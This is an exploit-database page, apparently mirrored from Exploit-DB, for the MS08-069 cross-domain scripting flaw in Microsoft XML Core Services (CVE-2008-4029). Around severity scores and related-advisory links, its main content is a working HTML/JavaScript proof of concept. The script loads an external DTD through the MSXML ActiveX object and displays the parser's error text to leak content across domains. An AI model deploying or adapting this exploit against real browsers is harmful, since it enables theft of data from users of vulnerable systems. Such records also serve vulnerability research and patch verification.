Lucene search
Jerome AthiasEDB-ID:7196HistoryNov 23, 2008 - 12:00 a.m.
Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069)
2008-11-2300:00:00
Jerome Athias
www.exploit-db.com
35
6.8 Medium
AI Score
Confidence
Low
4.3 Medium
CVSS2
Access Vector
Access Complexity
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.887 High
EPSS
Percentile
98.7%
<html>
<body>
KB955218 - CVE-2008-4029 - JA
<script type="text/javascript">
var dom = new ActiveXObject("Msxml2.DOMDocument.3.0");
dom.async = false;
var url = "http://www.milw0rm.com/forfun.dtd";
var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>";
if (dom.loadXML(xml) == 0)
{
alert("Blue or Red Pill? " + dom.parseError.srcText);
}
</script>
</body>
</html>
# milw0rm.com [2008-11-23]Related
cve
cve
CVE-2008-4029
2008-11-12 23:30:01
checkpoint_advisories
checkpoint_advisories
nvd
nvd
CVE-2008-4029
2008-11-12 23:30:01
prion
prion
Cross site scripting
2008-11-12 23:30:00
exploitpack
exploitpack
Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069)
2008-11-23 00:00:00
packetstorm
packetstorm
ms08-069.txt
2008-11-24 00:00:00
seebug
seebug
Microsoft XML Core Services DTD跨域信息泄露漏洞(MS08-069)
2008-11-13 00:00:00
Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069
2008-11-25 00:00:00
cvelist
cvelist
CVE-2008-4029
2008-11-12 23:00:00
openvas
openvas
Microsoft XML Core Services Remote Code Execution Vulnerability (955218)
2008-11-12 00:00:00
Microsoft XML Core Services Remote Code Execution Vulnerability (955218)
2008-11-12 00:00:00
securityvulns
securityvulns
mskb
mskb
nessus
nessus
6.8 Medium
AI Score
Confidence
Low
4.3 Medium
CVSS2
Access Vector
Access Complexity
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.887 High
EPSS
Percentile
98.7%
Related for EDB-ID:7196